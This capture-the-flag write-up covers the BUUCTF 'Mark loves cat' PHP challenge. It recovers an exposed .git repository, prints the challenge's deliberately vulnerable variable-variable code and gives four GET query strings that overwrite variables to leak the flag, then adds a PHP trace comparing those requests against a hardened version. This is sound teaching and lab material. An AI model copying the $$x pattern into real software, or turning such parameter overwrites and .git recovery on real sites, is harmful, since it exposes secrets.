BUUCTF WEB [BJDCTF2020]Mark loves cat
-
No vulnerability is visible in the page source. A dirsearch scan finds an exposed .git directory.
-
Use scrabble to recover the repository:
./scrabble http://70f9aaf8-036c-44f0-b1f1-df263f120cfa.node4.buuoj.cn:81/
-
This yields two files, flag.php and index.php.
flag.php
<?php $flag = file_get_contents('/flag');
-
The main PHP code in index.php
<?php
include 'flag.php';

$yds = "dog";
$is = "cat";
$handsome = 'yds';

foreach($_POST as $x => $y){
    $$x = $y;
}

foreach($_GET as $x => $y){
    $$x = $$y;
}

foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){
        exit($handsome);
    }
}

if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($yds);
}

if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){
    exit($is);
}

echo "the flag is: ".$flag;
-
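Solution 1
?handsome=flag&flag=foo&foo=flag
The parameters are passed via GET and processed by
foreach($_GET as $x => $y){ $$x = $$y; }
which, after substitution, executes
$handsome=$flag; $flag=$foo; $foo=$flag;
$handsome receives the flag first, before $flag is overwritten with the undefined $foo. Then, in this loop
foreach($_GET as $x => $y){ if($_GET['flag'] === $x && $x !== 'flag'){ exit($handsome); } }
when the iteration reaches
foo=flag
the if branch is entered and exit prints the flag.
-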
Solution 2
/?yds=flag
The parameter is passed via GET and processed by
foreach($_GET as $x => $y){ $$x = $$y; }
This foreach loop overwrites $yds so that it holds the value of $flag from flag.php. Then
if(!isset($_GET['flag']) && !isset($_POST['flag'])){ exit($yds); }
prints the flag.
-
Solution 3
?is=flag&flag=flag
The parameters are passed via GET and processed by
foreach($_GET as $x => $y){ $$x = $$y; }
This overwrites $is while leaving $flag unchanged (sending flag=flag via POST instead would change the value of $flag). Then
if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){ exit($is); }
prints the flag.
-
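Solution 4
?1=flag&flag=1
This bypasses the three if checks above, so the final echo prints the flag.
Note:
foreach($_GET as $x => $y){ if($_GET['flag'] === $x && $x !== 'flag'){ exit($handsome); } }
This loop uses a strict comparison. The 1 obtained from $_GET['flag'] is a string, while the 1 obtained in $x is an int (PHP converts a numeric-string array key to an integer), so the check is bypassed.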
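
The four requests above, traced through the page's logic and through a variant that does not use variable variables. This is an added example, not code from the challenge or from the original write-up. FLAG is a constructed placeholder, and vulnerable(), hardened() and the allow-list design are assumptions made for illustration.

```php
<?php
// Added example, not the challenge's code. FLAG is a constructed placeholder
// standing in for the value flag.php reads from /flag.
const FLAG = 'flag{constructed-placeholder}';

// The page's index.php logic as a function: returns [branch, output]
// instead of calling exit(), so each request can be traced offline.
function vulnerable(array $get, array $post): array
{
    $flag = FLAG;
    $yds = 'dog';
    $is = 'cat';
    $handsome = 'yds';

    foreach ($post as $x => $y) { $$x = $y; }             // request sets any variable
    foreach ($get as $x => $y)  { $$x = ${$y} ?? null; }  // request copies any variable

    foreach ($get as $x => $y) {
        // PHP stores the key "1" as int 1, so "1" === 1 is false here.
        if (($get['flag'] ?? null) === $x && $x !== 'flag') {
            return ['exit($handsome)', $handsome];
        }
    }
    if (!isset($get['flag']) && !isset($post['flag'])) {
        return ['exit($yds)', $yds];
    }
    if (($post['flag'] ?? null) === 'flag' || ($get['flag'] ?? null) === 'flag') {
        return ['exit($is)', $is];
    }
    return ['echo', 'the flag is: ' . $flag];
}

// One possible hardened design (an assumption of this example): request data
// stays in its own array, only allow-listed names are accepted, values are
// stored as literals, keys are compared as strings, the secret is not in scope.
function hardened(array $get, array $post): array
{
    $vars = ['yds' => 'dog', 'is' => 'cat', 'handsome' => 'yds'];
    foreach ([$post, $get] as $source) {
        foreach ($source as $name => $value) {
            if (array_key_exists($name, $vars) && is_string($value)) {
                $vars[$name] = $value;   // never dereferenced as a variable name
            }
        }
    }
    $sel = $get['flag'] ?? null;
    foreach (array_keys($get) as $x) {
        if ($sel === (string)$x && (string)$x !== 'flag') {
            return ['exit($handsome)', $vars['handsome']];
        }
    }
    if (!isset($get['flag']) && !isset($post['flag'])) {
        return ['exit($yds)', $vars['yds']];
    }
    if (($post['flag'] ?? null) === 'flag' || $sel === 'flag') {
        return ['exit($is)', $vars['is']];
    }
    return ['end', ''];
}

// The four query strings from the write-up.
$requests = ['handsome=flag&flag=foo&foo=flag', 'yds=flag', 'is=flag&flag=flag', '1=flag&flag=1'];
foreach ($requests as $qs) {
    parse_str($qs, $get);   // same key normalisation PHP applies to $_GET
    [$vb, $vo] = vulnerable($get, []);
    [$hb, $ho] = hardened($get, []);
    printf("%-32s vulnerable: %-15s leak=%-3s | hardened: %-15s leak=%s\n",
        $qs, $vb, strpos($vo, FLAG) !== false ? 'yes' : 'no',
        $hb, strpos($ho, FLAG) !== false ? 'yes' : 'no');
}
```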